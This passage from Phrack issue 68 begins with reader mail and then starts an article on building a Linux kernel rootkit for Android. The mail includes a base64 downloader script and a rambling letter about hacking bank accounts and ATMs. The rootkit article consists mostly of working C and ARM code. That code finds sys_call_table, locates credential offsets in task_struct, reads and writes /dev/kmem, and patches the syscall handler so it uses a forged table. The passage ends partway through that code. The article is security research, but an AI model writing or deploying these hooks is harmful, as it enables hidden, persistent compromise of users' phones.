which was not going to get us owned. However we got spam, that's for sure, sorry about that fellow readers. ] If you don't find it interesting please at least change your captcha because I'm really sick (and I'm sure I'm not the only one) of reading spam messages (I swear it was not me :). [ We'll do both so that you can get better :> ] I'm italian, therefore my english is not very good, [ Nobody's perfect! ] if the paper is so bad written it can't be even read, send it back to me, I'll try to rewrite it in a better way. Bye, darkjoker [ And that's the story of how his contribution got published in Linenoise. Thx darkjoker. ] --- [>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>] |--=[ 0x0A - The urge to get p68!!! ]=-----------------------------------=| [<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<] From: Barak ***** Subject: Question [ This one is not the current president of the US, we checked. ] Hi, I have been following the magazine for a while now and I have been waiting for the new issue. Last I checked it was suppose to come out in June... Can you let me know when I should except the new issue? [ Are you reading this? Then issue #68 is out. You're welcome. ] Barak [ That's the problem with every issue, you should NEVER trust us when we announce dates ;) ] --- From: Rodri ***** Subject: [ Hey ANTISPAM is missing! ] Hello, For godsake we are already in June! [ Sorry about that bro :) ] Now seriously and kindly is it coming out soon? Best regards. Roders. --- From: LEGEND XEON Subject: Phrack 68th Issue Release Hello mate, I am very interested in upcoming 68th issue of phrack. The whole world is counting on you!! [ The whole world? Not even the whole scene mate ;) ] I just want to know when will be the release and can you give me a glimpse of contents inside it. I will be eagerly waiting for your reply. [ Hehe, hope you didn't wait too much. ] ~Legend_Xeon --- From: fernando ****** Subject: my life gets duller every day you don't release the new issue [ Let's hope this one didn't commit suicide before we released :| ] [>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>] |--=[ 0x0B - Students project? ]=----------------------------------------=| [<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<] From: "(s) Charmaine Anderson" Subject: Creating Middle-Ware for Distributed Cryptanalytic Applications To whom it may concern, I am contacting you to tell you about my final year project for my degree. I would be very grateful if you were able to follow my progress and perhaps also contribute any tips and ideas. I will also be writing an application which, if successful, I will be posting online for download. Using the RC5 block cipher and the competitions run by RSA Laboratories (1997-2007) as benchmarks, experiments will be conducted using different methods of distributed computing. The implications of the results will lead to a better understanding of how cryptanalysis can be conducted through areas such as grids and internet-based cloud computing or virtualisation. The reason for this project is that distribution methods have been used for many years in order to conduct cryptanalysis; however, I have noticed that this has been for purposes such as testing the security of new ciphers and creating a better understanding of how they work. But, to my knowledge, there has been little-to-no research into the implications of real-world attacks through distribution. To summarise, I plan to test the limits of computational security in order to expose the possibility of real-world cryptanalytic attacks using the 'unlimited' computing power that is slowly becoming available to the public. It is possible to follow the progress of this project through http://www.distributedcryptanalysis.co.uk/. A number of blogs are also being used in order to attract more interest, links to these will be posted on the website very shortly. Yours Sincerely, Charmaine Anderson BSc (Hons) Forensic Computing University of Wales, Newport [ Well he seemed to be a good kid so we published his mail ;) ] --- From: Johannes Mitterer Subject: Hacker's Manifesto Dear Phrack-Team, currently I'm working on my bachelor's thesis part of which is an analysis of The Mentor's Hacker's Manifesto. In this context, there's little confusion about the question how the manifesto was first published. As I understand it, the manifesto was first published ONLINE in phrack magazin, whereas my professor stated that the first issues of phrack including Issue #7 in which the manifesto was published were only available offline as a printed version and later put on the internet. Perhaps You could help me clearing up this confusion. [ Wasn't the early edition of phrack all scene .txt philes on BBSes? Like, #7 was pre internet for sure. I doubt that any of the editors back then would have bothered printing hardcopies, since it is extremely inefficient and expensive and the target audience is ppl w/ computers. ] Thanks in advance! Yours, Johannes Mitterer [>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>] |--=[ 0x0C - Phrack & the chicks ]=--------------------------------------=| [<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<] From: kimberly - <*******@hotmail.com> Subject: Graduate essay Hello Staff, We are senior high school students from 'Stella Maris College' in the Netherlands and we are writing an essay about the reputation of hacking. If it is okay with you, we would like to ask a few questions: - How could you start the site, because hacking is illegal and it might endanger your users who discuss hacking? [ Wait it's illegal? We're shutting down the site immediately :| ] - Have you ever gotten negative/positive reactions to your site? And what where those reactions? [ Well everything is in this file :D ] - Is there any information that is not known to people who are not hackers and that is not easy to find in books or the internet? If so, where could we find this information? [ IRCS? Nah it's just for the chitchat :) ] - Is there anything in your opinion that is so important, that we can't possibly leave out? We would be very happy if you could answer these questions or forward this email to someone who might know more about this. [ I'm not too sure you guys will be able to graduate with that many questions so good luck :D ] Thank you very much in advance! - Dingding and Kimberly --- From: Eva ******* <*****@gmail.com> Subject: Article Dear Phrack Staff, I'm preparing an article concerning some hacks to Linden Lab's SecondLife viewer and I would like to publish the results in your magazine. Could you please, if possible, provide some details where and to whom I should send it to and if there are any requirements I must fulfil. Thank you, Eva [ We published the paper in the linenoise. Thanks for the submission Eva! Nice pics btw ;> ] [>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>] |--=[ 0x0D - ROFL ]=-----------------------------------------------------=| [<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<] From: ***** ***** <****.*****.****@gmail.com> Subject: script Man, I was bored taking a break from working on a vpn project at a library and decided to make a script in bash to download and decompress the phrack mags. Its newb meat but I guess Im just going to send it in for you guys to laugh at, rofl. [ ROFL indeed. ] --- Jackie ***** ****** - *"Focus on Solutions not Problems"* [ But you create solutions for non existent problems :D ] Email0: *****.*****.*****@gmail.com Email1: skraps_rwt@yahoo.com [ We added the script below. If someone could help Nikol Eleutheriou to decrypt it so that she doesn't complain please... ] begin-base64 644 getPhrack.sh IyEvYmluL2Jhc2gKCiNDVVJJU1NVRT0iNjciClVSTD0iaHR0cDovL3d3dy5w aHJhY2sub3JnL2FyY2hpdmVzL3Rnei8iCkVaSU5FRElSPSIvaG9tZS9za3Jh cHMvZXppbmVzL3BocmFjay8iCkNVUklTU1VFPWBHRVQgaHR0cDovL3d3dy5w aHJhY2sub3JnLyB8IGdyZXAgSVNTVUUgfCBjdXQgLWIgNTAtNTFgCiNwaHJh Y2s2Ny50YXIuZ3oKCmNkICRFWklORURJUgoKZXhpdHN0YXQoKXsKCWlmIFsg JD8gPT0gIjAiIF07IHRoZW4KCQllY2hvICJFeHRyYWN0aW9uIHN1c2NjZXMi CgllbHNlCiAgICAgICAgICAgICAgICBlY2hvICJFeHRyYWN0aW9uIGZhaWxl ZCIKICAgICAgICBmaQp9Cgpmb3IgKCggeD0xOyB4PCRDVVJJU1NVRTsgeCsr ICkpOyBkbwoJaWYgWyAtZiAke0VaSU5FRElSfXBocmFjayR7eH0udGFyLmd6 IF07IHRoZW4KCWVjaG8gIklzc3VlICR4IGV4aXN0cyIKCQlpZiBbIC1lICR7 RVpJTkVESVJ9JHt4fSBdOyB0aGVuCgkJCWVjaG8gIklzc3VlIHByZXZpb3Vz bHkgZXh0cmFjdGVkIgoJCWVsc2UKCQkJZWNobyAiRXh0cmFjdGluZyBJc3N1 ZSAkeCIKCQkJdGFyIHp4ZiAke0VaSU5FRElSfXBocmFjayR7eH0udGFyLmd6 CgkJCWV4aXRzdGF0CgkJZmkKCWVsc2UKCgkJZWNobyAiRG93bmxvYWRpbmcg aXNzdWUgJHggLi4uLiIKCQlHRVQgJHtVUkx9cGhyYWNrJHt4fS50YXIuZ3og PiAke0VaSU5FRElSfXBocmFjayR7eH0udGFyLmd6CgkJZWNobyAiRG9uZSBk b3dubG9hZGluZyBpc3N1ZSAkeCAuLi4uIgoJCWVjaG8gIkV4dHJhY3Rpbmcg aXNzdWUgJHgiCgkJdGFyIHp4dmYgJHtFWklORURJUn1waHJhY2ske3h9LnRh ci5negoJCWV4aXRzdGF0CglmaQpkb25lICAK ==== --- From: Tom Subject: Phrack Rules The World! Hi there, I like hacking but I never done it. [ So how do you know that you like it? ] Wrote a poem about it. [ Was it worth it? ] I wanna work in IT as systems admin. [ Hem... ok? Why? :) ] Please publish my poem in your magazine. [ Done! ] Phrack Rules! [ Sure it does! ] Heil from London, England. Razor Tech Warrior They told you that you were nothing Just another name and number They said you were dumb and dumber But you stole Their lives away Network Nazi Live to fight another day [ Network Nazi Live to fight another day <-- WTF ???? ] Through the black Of the nights metal sheets In tower blocks and tenements Cyber crime it breeds The government will stomp you out But burn their kernel Lock it down While others are still asleep. [ We are speechless. All we can say is: LOL. ] --- From: Tom Subject: Some Photos From London Hi there, Just thought i would send u some pics of me and my family/friends. i love the mag am a big fan...keep up the good work. [ And he really sent us pics. Your Grandma seems nice btw but you look like a virgin geek unfortunately :( ] --- From: b-fox <*****@bol.com.br> Subject: Hey... Mother fucker [ Hey. p0rn industry calls it MILF fucking ] Wait my document... I'm gonna write I paper today about/regarding bomb development and something abt legislation in general. Huge hug! [ Priceless. :') ] [>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>] |--=[ 0x0E - Shame Shame Shame.......shame on you ]=---------------------=| [<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<] From: varenya mehta Subject: ANTISPAM Run both ethernet and phone over existing Cat-5 cable [ Cool! New submission! \o/ ] The new fad when building a house is to run Cat-5 cable to every wall jack. These jacks can then be used for either ethernet or phone. When we got our new house built, we chose to get four of these jacks, and we intended to use them for phone service. Unfortunately, the wifi is a bit flaky in places (even with two access points.) This got annoying up until the point where three of the four wall jacks were being used for ethernet, leaving just one for phone. This was a problem. The solution is to run both ethernet and phone over the same existing cat-5 cable. Every wall jack becomes two jacks, one RJ-11 for phone and one RJ-45 for ethernet. This neat hack could save you a lot of money, as you only have to buy new wall plates and jacks rather than wall plates, jacks, and hundreds of feet of wire. [ Really cool hack. This one may fit in the linenoise :) ] [...] Also note that this procedure will not work with PoE (Power over Ethernet) devices. Nothing bad will happen, it just won't transmit power. See step 13 for apossibly unsafe way to keep your PoE and add phone service. Also, it will not work with gigabit ethernet-- gigabit ethernet uses all four pairs. It will work fine at 10/100 Mbps which is sufficient for most people [ Wait! Something is wrong. What is step13 and aren't a few things missing? Let's google() a bit... @(X_X)@ http://www.instructables.com/id/Hack-your-House-Run-both-ethernet- and-phone-over-/ So not only did you send us a ripped paper. But you idiot were not smart enough to click on "Next step" to copy the whole. LOL. ] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ P.S. -please reply whether my submission will be added or not in this edition of ur highly esteemed Phrack magazine...loking forward to your reply :) cheers [ Ur highly esteemed Phrack magazine would recommend to go shoot yourself. ] [>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>] |--=[ 0x0F - Insanity or SPAM??? ]=--------------------------------------=| [<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<] --- From: John Smith Subject: Dear staff(at)phrack[DOT]org; I love what you guys do for the U.S.A! Can you email your e news letters too please? Thank you. Can you please add me to your e-news letter list, so that I can recieve new updates from your cite? I totally loved what you guys had written about ai, and mind hacking and about hacking for the U.S. and Cypher Punks & Ninja Strike Force! Best of luck to all of you staff members at Phrack! I would like to know if you guys could please email me back some information in regards about rsome bank accounts that was on CRYPTOME, or if you guys could tell me about how you all had cash flow that came from hacked ATM terminals that you guys had done remotely, because I need to be hacking systems right now and I had all of my stuff jacked and I was robbed with all of your softwares that I had for CIA/ NSA and I've been trying to log onto some banking systems for my CIA/ NSA digital cash, or could you guys send me some lock picks, or DIE BOLD keys to open some safes and vaults or could you send me some Cypher Punks white paiges or other instructions to interceptor frozen accounts on line and or how to obtain money for starting a Cypher Punks EBB & FLO system to develope an agriculture business plan that will help finance money for CIA & NSA op (ie- with IQT and with Foresight Nanotechnology Institute and with CTBA.org) to counter the HASHID culture? Such as GSPC in Morocco and in Algeria, GIA, FIS, ETI, AQIM, Sahel Pan, DR-CONGO, AQAP, Hezbollah, HAMAS, Hizbullah, IMU, and fighting against the salafyists in the Magreb's EU-Arabia HASHID zones, and against the EVIL EMPIRE's MOIS, MEK, MEKO, PKK, VEVAK, ISI, FSB, KGB, NAK, GRU, and Brazillian Guerillas and Chychenian Rebels and mob and Russian Mob for GAZPROM Russian Mob Oil Monopoly and countering all of these groups members and contacts and countering their economic insugernt threats internationally, by hacking into their networks and locating them with RNM ai, and blood clotting the Evil Empire, and moving and on the GO like CIA backing the "Wrath of GOD" and with the Cult of CIA's MKULTRA program, and I mean redndering synapsial "WET WORK" by taking their ballance with the "EXIT BLOW," for NSA/ CIA's Ninja Strike Force and I want to be taking our threats to the Land of Snow and flurries will show me to the rest of their Evil Empires members locations by terminating them with Illuminati and I'll be hacking their minds and their bank accounts and stealing all of their wealth and contacts and other intelligence for RED Team, and taking their materials as loot, and sending it onto an encrypted site, but I want to creat my own ai online site with grant.gov grant money asap, and then once that's done I can go and locate them with RNM ai, but I would like aving somean ai quantum consciousness program with a self assembling "FOG" EW ai HDD quantum computer with an infinite memory that would allow me to hack bank accounts with an ip installed with nano-bio-technologies with inner cellular blood vessel programming and cellular mind net morphing technologies with RNM, nanotechnology made with a neuronal networking and has a 3-d holographic video and 3-d holographic audio with real world and mirror world ai 3-d/ 4-d softwares for an online Cypher Punks & Ninja Strike Force & Cult of Dead Cow members with other CIA/ NSA Intelligence Analysis Cammander's of Red Teaming (aka- COUNTER-INTELLIGENCE TEAM's ALPHA & BRAVO:) Black Ops- Red Teaming forum with an ai 3-d GOOGLE EARTH PRO GPS softwares with a soft mobi GLOBAL IP softwares package STEALTH NINJA phone with SIG PRO Telecommunications softwares for NSA & CIA CT:qto let me know about a should Tchao with Respect- Fabian. [ What the fuck is that shit??? ] --- From: John Smith Subject: ANTISPAM [ Hey it's you again! ] Dear Phrack magazine, Hello my name is SA John Smith, I'm from No Town, VA. but moved to Brosnan, Missouri a few years back, and just recently moved to the huge L.A.; but, I would like to discuss some about covering some articles about Konkrete Jungle music parties and drum and bass massives done internationally, to help promote Cypher Punks Ebb & Flo Garden's and to help promote Covert Operations and Covert Actions for Cypher Punks, Ninja Strike Force, CIA MK-ULTRA and Red Teaming financing and donation sources to do shadowing, spike zones, drop deads, and some net working for some brush offs of information, softwares, and to cache equipment and personell at Squats (ie- abbandonned buildings, subway stations, subterrainean tunnels, Ligne Imagineaux types of areas, beach houses, Four Seasons Resort, casino's, Def Con Seminar, yahts, and other jungle music parties and be for the U.S. like the Maquis- WWII French Resistance, OSS, OAS, SIS, CSIS, CIA, Mossad, Shin Bet, NSA, and others from NATO and U.S. Coalition Forces, and some U.N. Merc's and other types of PMCS's Mercenaries for hire;) But, also covering atm hacking, to recieve cash and Flow in Game Theory like doing Parkour tricks in Mirror's Edge for Intelligence Analysis Red Team Well, I gotta go now, best wishes to you all, and I'll contact you again, or better yet, just contact me with ai, and we can meet up. Tchao- The Devils Advocate. [ Spamming or brainfucked? ] |--=[ EOF ]=-------------------------------------------------------------=| ============== Page 6/17 ============== ==Phrack Inc.== Volume 0x0e, Issue 0x44, Phile #0x06 of 0x13 |=-----------------------------------------------------------------------=| |=-----------=[ Android platform based linux kernel rootkit ]=-----------=| |=-----------------------------------------------------------------------=| |=-----------------=[ dong-hoon you ]=-----------------=| |=------------------------=[ April 04th 2011 ]=--------------------------=| |=-----------------------------------------------------------------------=| --[ Contents 1 - Introduction 2 - Basic techniques for hooking 2.1 - Searching sys_call_table 2.2 - Identifying sys_call_table size 2.3 - Getting over the problem of structure size in kernel versions 2.4 - Treating version magic 3 - sys_call_table hooking through /dev/kmem access technique 4 - modifying sys_call_table handle code in vector_swi handler routine 5 - exception vector table modifying hooking techniques 5.1 - exception vector table 5.2 - Hooking techniques changing vector_swi handler 5.3 - Hooking techniques changing branch instruction offset 6 - Conclusion 7 - References 8 - Appendix: earthworm.tgz.uu --[ 1 - Introduction This paper covers rootkit techniques that can be used in linux kernel based on Android platform using ARM(Advanced RISC Machine) process. All the tests in this paper were performed in Motoroi XT720 model(2.6.29-omap1 kernel) and Galaxy S SHW-M110S model(2.6.32.9 kernel). Note that some contents may not apply to all smart platform machines and there are some bugs you can modify. We have seen various linux kernel hooking techniques of some pioneers([1] [2][3][4][5]). Especially, I appreciate to Silvio Cesare and sd who introduced and developed the /dev/kmem technique. Read the references for more information. In this paper, we are going to discuss a few hooking techniques. 1. Simple and traditional hooking technique using kmem device. 2. Traditional hooking technique changing sys_call_table offset in vector_swi handler. 3. Two newly developed hooking techniques changing interrupt service routine handler in exception vector table. The main concepts of the techniques mentioned in this paper are 'smart' and 'simple'. This is because this paper focuses on hooking through modifying the least kernel memory and by the simplest way. As the past good techniques were, hooking must be possible freely before and after system call. This paper consists of eight parts and I tried to supply various examples for readers' convenience by putting abundant appendices. The example codes are written for ARM architecture, but if you modify some parts, you can use them in the environment of ia32 architecture and even in the environment that doesn't support LKM. --[ 2 - Basic techniques for hooking sys_call_table is a table which stores the addresses of low-level system routines. Most of classical hooking techniques interrupt the sys_call_table for some purposes. Because of this, some protection techniques such as hiding symbol and moving to the field of read-only have been adapted to protect sys_call_table from attackers. These protections, however, can be easily removed if an attacker uses kmem device access technique. To discuss other techniques making protection useless is beyond the purpose of this paper. --[ 2.1 - Searching sys_call_table If sys_call_table symbol is not exported and there is no sys_call_table information in kallsyms file which contains kernel symbol table information, it will be difficult to get the sys_call_table address that varies on each version of platform kernel. So, we need to research the way to get the address of sys_call_table without symbol table information. You can find the similar techniques in the web[10], but apart from this, this paper is written to meet the Android platform on the way of testing. --[ 2.1.1 - Getting sys_call_table address in vector_swi handler At first, I will introduce the first two ways to get sys_call_table address The code I will introduce here is written dependently in the interrupt implementation of ARM process. Generally, in the case of ARM process, when interrupt or exception happens, it branches to the exception vector table. In that exception vector table, there are exception hander addresses that match each exception handler routines. The kernel of present Android platform uses high vector (0xffff0000) and at the point of 0xffff0008, offset by 0x08, there is a 4 byte instruction to branch to the software interrupt handler. When the instruction runs, the address of the software interrupt handler stored in the address 0xffff0420, offset by 0x420, is called. See the section 5.1 for more information. void get_sys_call_table(){ void *swi_addr=(long *)0xffff0008; unsigned long offset=0; unsigned long *vector_swi_addr=0; unsigned long sys_call_table=0; offset=((*(long *)swi_addr)&0xfff)+8; vector_swi_addr=*(unsigned long *)(swi_addr+offset); while(vector_swi_addr++){ if(((*(unsigned long *)vector_swi_addr)& 0xfffff000)==0xe28f8000){ offset=((*(unsigned long *)vector_swi_addr)& 0xfff)+8; sys_call_table=(void *)vector_swi_addr+offset; break; } } return; } At first, this code gets the address of vector_swi routine(software interrupt process exception handler) in the exception vector table of high vector and then, gets the address of a code that handles the sys_call_table address. The followings are some parts of vector_swi handler code. 000000c0 : c0: e24dd048 sub sp, sp, #72 ; 0x48 (S_FRAME_SIZE) c4: e88d1fff stmia sp, {r0 - r12} ; Calling r0 - r12 c8: e28d803c add r8, sp, #60 ; 0x3c (S_PC) cc: e9486000 stmdb r8, {sp, lr}^ ; Calling sp, lr d0: e14f8000 mrs r8, SPSR ; called from non-FIQ mode, so ok. d4: e58de03c str lr, [sp, #60] ; Save calling PC d8: e58d8040 str r8, [sp, #64] ; Save CPSR dc: e58d0044 str r0, [sp, #68] ; Save OLD_R0 e0: e3a0b000 mov fp, #0 ; 0x0 ; zero fp e4: e3180020 tst r8, #32 ; 0x20 ; this is SPSR from save_user_regs e8: 12877609 addne r7, r7, #9437184; put OS number in ec: 051e7004 ldreq r7, [lr, #-4] f0: e59fc0a8 ldr ip, [pc, #168] ; 1a0 <__cr_alignment> f4: e59cc000 ldr ip, [ip] f8: ee01cf10 mcr 15, 0, ip, cr1, cr0, {0} ; update control register fc: e321f013 msr CPSR_c, #19 ; 0x13 enable_irq 100: e1a096ad mov r9, sp, lsr #13 ; get_thread_info tsk 104: e1a09689 mov r9, r9, lsl #13 [*]108: e28f8094 add r8, pc, #148 ; load syscall table pointer 10c: e599c000 ldr ip, [r9] ; check for syscall tracing The asterisk part is the code of sys_call_table. This code notifies the start of sys_call_table at the appointed offset from the present pc address. So, we can get the offset value to figure out the position of sys_call_table if we can find opcode pattern corresponding to "add r8, pc" instruction. opcode: 0xe28f8??? if(((*(unsigned long *)vector_swi_addr)&0xfffff000)==0xe28f8000){ offset=((*(unsigned long *)vector_swi_addr)&0xfff)+8; sys_call_table=(void *)vector_swi_addr+offset; break; From this, we can get the address of sys_call_table handled in vector_swi handler routine. And there is an easier way to do this. --[ 2.1.2 - Finding sys_call_table addr through sys_close addr searching The second way to get the address of sys_call_table is simpler than the way introduced in 2.1.1. This way is to find the address by using the fact that sys_close address, with open symbol, is in 0x6 offset from the starting point of sys_call_table. ... the same vector_swi address searching routine parts omitted ... while(vector_swi_addr++){ if(*(unsigned long *)vector_swi_addr==&sys_close){ sys_call_table=(void *)vector_swi_addr-(6*4); break; } } } By using the fact that sys_call_table resides after vector_swi handler address, we can search the sys_close which is appointed as the sixth system call of sys_table_call. fs/open.c: EXPORT_SYMBOL(sys_close); ... call.S: /* 0 */ CALL(sys_restart_syscall) CALL(sys_exit) CALL(sys_fork_wrapper) CALL(sys_read) CALL(sys_write) /* 5 */ CALL(sys_open) CALL(sys_close) This searching way has a technical disadvantage that we must get the sys_close kernel symbol address beforehand if it's implemented in user mode. --[ 2.2 - Identifying sys_call_table size The hooking technique which will be introduced in section 4 changes the sys_call_table handle code within vector_swi handler. It generates the copy of the existing sys_call_table in the heap memory. Because the size of sys_call_table varies in each platform kernel version, we need a precise size of sys_call_table to generate a copy. ... the same vector_swi address searching routine parts omitted ... while(vector_swi_addr++){ if(((*(unsigned long *)vector_swi_addr)& 0xffff0000)==0xe3570000){ i=0x10-(((*(unsigned long *)vector_swi_addr)& 0xff00)>>8); size=((*(unsigned long *)vector_swi_addr)& 0xff)<<(2*i); break; } } } This code searches code which controls the size of sys_call_table within vector_swi routine and then gets the value, the size of sys_call_table. The following code determines the size of sys_call_table, and it makes a part of a function that calls system call saved in sys_call_table. 118: e92d0030 stmdb sp!, {r4, r5} ; push fifth and sixth args 11c: e31c0c01 tst ip, #256 ; are we tracing syscalls? 120: 1a000008 bne 148 <__sys_trace> [*]124: e3570f5b cmp r7, #364 ; check upper syscall limit 128: e24fee13 sub lr, pc, #304 ; return address 12c: 3798f107 ldrcc pc, [r8, r7, lsl #2] ; call sys_* routine The asterisk part compares the size of sys_call_table. This code checks if the r7 register value which contains system call number is bigger than syscall limit. So, if we search opcode pattern(0xe357????) corresponding to "cmp r7", we can get the exact size of sys_call_table. For your information, all of the offset values can be obtained by using ARM architecture operand counting method. --[ 2.3 - Getting over the problem of structure size in kernel versions Even if you are using the same version of kernels, the size of structure varies according to the compile environments and config options. Thus, if we use a wrong structure with a wrong size, it is not likely to work as we expect. To prevent errors caused by the difference of structure offset and to enable our code to work in various kernel environments, we need to build a function which gets the offset needed from the structure. void find_offset(void){ unsigned char *init_task_ptr=(char *)&init_task; int offset=0,i; char *ptr=0; /* getting the position of comm offset within task_struct structure */ for(i=0;i<0x600;i++){ if(init_task_ptr[i]=='s'&&init_task_ptr[i+1]=='w'&& init_task_ptr[i+2]=='a'&&init_task_ptr[i+3]=='p'&& init_task_ptr[i+4]=='p'&&init_task_ptr[i+5]=='e'&& init_task_ptr[i+6]=='r'){ comm_offset=i; break; } } /* getting the position of tasks.next offset within task_struct structure */ init_task_ptr+=0x50; for(i=0x50;i<0x300;i+=4,init_task_ptr+=4){ offset=*(long *)init_task_ptr; if(offset&&offset>0xc0000000){ offset-=i; offset+=comm_offset; if(strcmp((char *)offset,"init")){ continue; } else { next_offset=i; /* getting the position of parent offset within task_struct structure */ for(;i<0x300;i+=4,init_task_ptr+=4){ offset=*(long *)init_task_ptr; if(offset&&offset>0xc0000000){ offset+=comm_offset; if(strcmp ((char *)offset,"swapper")) { continue; } else { parent_offset=i+4; break; } } } break; } } } /* getting the position of cred offset within task_struct structure */ init_task_ptr=(char *)&init_task; init_task_ptr+=comm_offset; for(i=0;i<0x50;i+=4,init_task_ptr-=4){ offset=*(long *)init_task_ptr; if(offset&&offset>0xc0000000&&offset<0xd0000000&& offset==*(long *)(init_task_ptr-4)){ ptr=(char *)offset; if(*(long *)&ptr[4]==0&& *(long *)&ptr[8]==0&& *(long *)&ptr[12]==0&& *(long *)&ptr[16]==0&& *(long *)&ptr[20]==0&& *(long *)&ptr[24]==0&& *(long *)&ptr[28]==0&& *(long *)&ptr[32]==0){ cred_offset=i; break; } } } /* getting the position of pid offset within task_struct structure */ pid_offset=parent_offset-0xc; return; } This code gets the information of PCB(process control block) using some features that can be used as patterns of task_struct structure. First, we need to search init_task for the process name "swapper" to find out address of "comm" variable within task_struct structure created before init process. Then, we search for "next" pointer from "tasks" which is a linked list of process structure. Finally, we use "comm" variable to figure out whether the process has a name of "init". If it does, we get the offset address of "next" pointer. include/linux/sched.h: struct task_struct { ... struct list_head tasks; ... pid_t pid; ... struct task_struct *real_parent; /* real parent process */ struct task_struct *parent; /* recipient of SIGCHLD, wait4() reports */ ... const struct cred *real_cred; /* objective and real subjective task * credentials (COW) */ const struct cred *cred; /* effective (overridable) subjective task */ struct mutex cred_exec_mutex; /* execve vs ptrace cred calculation mutex */ char comm[TASK_COMM_LEN]; /* executable name ... */ After this, we get the parent pointer by checking some pointers. And if this is a right parent pointer, it has the name of previous task(init_task) process, swapper. The reason we search the address of parent pointer is to get the offset of pid variable by using a parent offset as a base point. To get the position of cred structure pointer related with task privilege, we perform backward search from the point of comm variable and check if the id of each user is 0. --[ 2.4 - Treating version magic Check the whitepaper[11] of Christian Papathanasiou and Nicholas J. Percoco in Defcon 18. The paper introduces the way of treating version magic by modifying the header of utsrelease.h when we compile LKM rootkit module. In fact, I have used a tool which overwrites the vermagic value of compiled kernel module binary directly before they presented. --[ 3 - sys_call_table hooking through /dev/kmem access technique I hope you take this section as a warming-up. If you want to know more detailed background knowledge about /dev/kmem access technique, check the "Run-time kernel patching" by Silvio and "Linux on-the-fly kernel patching without LKM" by sd. At least until now, the root privilege of access to /dev/kmem device within linux kernel in Android platform is allowed. So, it is possible to move through lseek() and to read through read(). Newly written /dev/kmem access routines are as follows. #define MAP_SIZE 4096UL #define MAP_MASK (MAP_SIZE - 1) int kmem; /* read data from kmem */ void read_kmem(unsigned char *m,unsigned off,int sz) { int i; void *buf,*v_addr; if((buf=mmap(0,MAP_SIZE*2,PROT_READ|PROT_WRITE, MAP_SHARED,kmem,off&~MAP_MASK))==(void *)-1){ perror("read: mmap error"); exit(0); } for(i=0;i code of sys_call_table ldr ip, [tsk, #TI_FLAGS] ; @ check for syscall tracing code after compile: 000000c0 : ... 100: e1a096ad mov r9, sp, lsr #13 ; get_thread_info tsk 104: e1a09689 mov r9, r9, lsl #13 [*]108: e28f8094 add r8, pc, #148 ; load syscall table pointer ~~~~~~~~~~~~~~~~~~~~ +-> deal sys_call_table as relative offset 10c: e599c000 ldr ip, [r9] ; check for syscall tracing So, I contrived a hooking technique modifying "add r8, pc, #offset" code itself like this. before modifying: e28f80?? add r8, pc, #?? after modifying: e59f80?? ldr r8, [pc, #??] These instructions get the address of sys_call_table at the specified offset from the present pc address and then store it in r8 register. As a result, the address of sys_call_table is stored in r8 register. Now, we have to make a separated space to store the address of sys_call_table copy near the processing routine. After some consideration, I decided to overwrite nop code of other function's epilogue near vector_swi handler. 00000174 <__sys_trace_return>: 174: e5ad0008 str r0, [sp, #8]! 178: e1a02007 mov r2, r7 17c: e1a0100d mov r1, sp 180: e3a00001 mov r0, #1 ; 0x1 184: ebfffffe bl 0 188: eaffffb1 b 54 [*]18c: e320f000 nop {0} ~~~~~~~~ -> position to overwrite the copy of sys_call_table 190: e320f000 nop {0} ... 000001a0 <__cr_alignment>: 1a0: 00000000 .... 000001a4 : Now, if we count the offset from the address of sys_call_table to the address overwritten with the address of sys_call_table copy and then modify code, we can use the table we copied whenever system call is called. The hooking code modifying some parts of vector_swi handling routine and nop code near the address of sys_call_table is as follows: void install_hooker(){ void *swi_addr=(long *)0xffff0008; unsigned long offset=0; unsigned long *vector_swi_addr=0,*ptr; unsigned char buf[MAP_SIZE+1]; unsigned long modify_addr1=0; unsigned long modify_addr2=0; unsigned long addr=0; char *addr_ptr; offset=((*(long *)swi_addr)&0xfff)+8; vector_swi_addr=*(unsigned long *)(swi_addr+offset); memset((char *)buf,0,sizeof(buf)); read_kmem(buf,(long)vector_swi_addr,MAP_SIZE); ptr=(unsigned long *)buf; /* get the address of ldr that handles sys_call_table */ while(ptr){ if(((*(unsigned long *)ptr)&0xfffff000)==0xe28f8000){ modify_addr1=(unsigned long)vector_swi_addr; break; } ptr++; vector_swi_addr++; } /* get the address of nop that will be overwritten */ while(ptr){ if(*(unsigned long *)ptr==0xe320f000){ modify_addr2=(unsigned long)vector_swi_addr; break; } ptr++; vector_swi_addr++; } /* overwrite nop with hacked_sys_call_table */ addr_ptr=(char *)get_kernel_symbol("hacked_sys_call_table"); write_kmem((char *)&addr_ptr,modify_addr2,4); /* calculate fake table offset */ offset=modify_addr2-modify_addr1-8; /* change sys_call_table offset into fake table offset */ addr=0xe59f8000+offset; /* ldr r8, [pc, #offset] */ addr_ptr=(char *)addr; 